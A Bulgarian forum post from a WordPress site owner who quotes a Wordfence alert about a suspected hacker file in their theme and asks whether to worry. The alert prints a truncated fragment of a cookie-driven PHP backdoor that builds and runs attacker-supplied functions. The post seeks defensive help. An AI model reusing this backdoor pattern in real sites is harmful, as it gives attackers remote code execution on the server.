Съобщение

Collapse
No announcement yet.

Злонамерен код в Wordpress

Collapse
X
  • Филтър
  • Период
  • Показване на
Clear All
нови коментари

  • Злонамерен код в Wordpress

    Здравейте,
    Имам следния проблем:
    Имам инсталиран wordfence в моя сайт. По принцип ми излизат нотификации за ъпдейт на плъгини и теми, но днес забелязах, че имам потенциален злонамерен код в темата ми.
    Логът е следният:

    Code:
     This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: "$prn=$_COOKIE;\x0d\x0a$ybak=$prn[omcm];\x0d\x0aif($ybak){\x0d\x0a\x09$bus=$ybak($prn[leox]);$ymyov=$ybak($prn[qbxl]);$swn=$bus("",$ymyov);$swn(". The infection type is: G212 - variation 2.
    Трябва ли да се притеснявам?
    Благодаря предварително!
Изчакайте...
X